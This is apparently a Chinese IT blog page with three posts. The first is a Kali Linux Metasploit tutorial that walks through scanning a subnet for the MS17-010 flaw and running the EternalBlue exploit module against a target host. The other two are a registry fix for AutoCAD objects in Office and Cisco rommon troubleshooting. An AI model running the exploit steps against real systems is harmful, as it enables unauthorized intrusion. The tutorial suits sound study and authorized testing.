2017年10月30日 星期一

Kali Linux - Metasploit 使用方法

1.更新metasploit版本
apt-get update
apt-get install metasploit-framework

2.開啟Metasploit
msfconsole

3.常用指令說明
help:檢視執行指令的資訊
search module:搜尋特定模組
use module:載入特定模組
info:查訊目前使用模組的資訊
options:查看需要設定的參數
set option module:設定模組內的參數
check:測試
run:執行滲透攻擊模組
back:回到上層

範例 - 攻擊Microsoft的MS17_010漏洞

search ms17_010


a.大範圍搜索攻擊目標
use auxiliary/scanner/smb/smb_ms17_010
options
set RHOSTS 192.168.33.1/24
set THREADS 16
run


















 
b.攻擊特定目標
use exploit/windows/smb/ms17_010_eternalblue
options
set RHOST 192.168.33.106
RUN


c.滲透成功
ipconfig
whoami

2017年10月26日 星期四

Word、Excel、PowerPoint無法插入物件(CAD圖檔 *.dwg)、或開啟物件(CAD圖檔 *.dwg)會出現錯誤訊息

問題描述:
1.Word、Excel、PowerPoint插入物件DWG圖檔,出現「無法插入物件」。
2.開啟Word、Excel、PowerPoint內DWG圖檔,出現「無法啟動此內嵌物件的來源應用程式」。











解決方法:
1.查詢AutoCAD版本的CLSID
執行「regedit」開啟登錄編輯程式,展開HKEY_CLASSES_ROOT\AutoCAD.Drawing.[格式編號]\CLSID,查詢AutoCAD的CLSID。
ex:
HKEY_CLASSES_ROOT\AutoCAD.Drawing.20\CLSID =>AutoCAD 2016
HKEY_CLASSES_ROOT\AutoCAD.Drawing.21\CLSID =>AutoCAD 2017

目前已知的AutoCAD版本CLSID碼如下
R14:{5E4405B0-5374-11CE-8E71-0020AF04B1D7}
2000/2001/2002:{4D3263E4-CAB7-11D2-802A-0080C703929C}
2004/2005/2006:{8E75D913-3D21-11D2-85C4-080009A0C626}
2007/2008/2009:{7AABBB95-79BE-4C0F-8024-EB6AF271231C}
2010/2011/2012:{D70E31AD-2614-49F2-B0FC-ACA781D81F3E}
2013/2014/2015:{6A221957-2D85-42A7-8E19-BE33950D1DEB}
2016:{149DD748-EA85-45A6-93C5-AC50D0260C98}
2017:{720DB9AF-D62C-4ED0-A377-429C22312852}


2.複製底下米字內的內容,貼上至記事本,根據您使用的CAD版本,更改@後面的CLSID值(以下是使用AutoCAD 2016),儲存為reg檔後執行。

******************************************************************************
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{5E4405B0-5374-11CE-8E71-0020AF04B1D7}\AutoConvertTo]
@="{149DD748-EA85-45A6-93C5-AC50D0260C98}"

[HKEY_CLASSES_ROOT\CLSID\{4D3263E4-CAB7-11D2-802A-0080C703929C}\AutoConvertTo]
@="{149DD748-EA85-45A6-93C5-AC50D0260C98}"

[HKEY_CLASSES_ROOT\CLSID\{8E75D913-3D21-11d2-85C4-080009A0C626}\AutoConvertTo]
@="{149DD748-EA85-45A6-93C5-AC50D0260C98}"

2017年10月11日 星期三

Cisco Router 重開機會進入rommon模式

請檢查映像檔是否還在及組態暫存器值,也可試著設定boot system

1.檢查falsh0內的IOS 映像檔是否還在
Cisco_Router#dir flash:
Directory of flash0:/

    1  -rw-    76900964   Sep 2 2015 14:11:48 +00:00  c1900-universalk9-mz.SPA.155-1.T1.bin
    2  -rw-        3066   Sep 2 2015 14:20:34 +00:00  cpconfig-19xx.cfg
    3  -rw-         720  Dec 29 2015 11:29:16 +00:00  vlan.dat
    4  drw-           0   Sep 2 2015 14:20:56 +00:00  ccpexp
  459  -rw-        2885   Sep 2 2015 14:24:46 +00:00  home.shtml

2.檢查當前的組態暫存器值是否為0x2102
Cisco_Router#show version

Configuration register is 0x2102

如果不是0x2102,更改指令如下
Cisco_Router#conf t
Cisco_Router(config)#config-register 0x2102
[Ctrl-Z]
Cisco_Router#reload

3.設定boot system
Cisco_Router#dir flash:
Directory of flash0:/

    1  -rw-    76900964   Sep 2 2015 14:11:48 +00:00  c1900-universalk9-mz.SPA.155-1.T1.bin
    2  -rw-        3066   Sep 2 2015 14:20:34 +00:00  cpconfig-19xx.cfg
    3  -rw-         720  Dec 29 2015 11:29:16 +00:00  vlan.dat
    4  drw-           0   Sep 2 2015 14:20:56 +00:00  ccpexp
  459  -rw-        2885   Sep 2 2015 14:24:46 +00:00  home.shtml

設定前,無boot system資料
Cisco_Router#show run | inc boot
boot-start-marker
boot-end-marker

Cisco_Router#conf t
Cisco_Router(config)#boot system flash0:c1900-universalk9-mz.SPA.155-1.T1.bin
[Ctrl-Z]
Cisco_Router#write

設定後
Cisco_Router#show run | inc boot
boot-start-marker
boot system flash0:c1900-universalk9-mz.SPA.155-1.T1.bin
boot-end-marker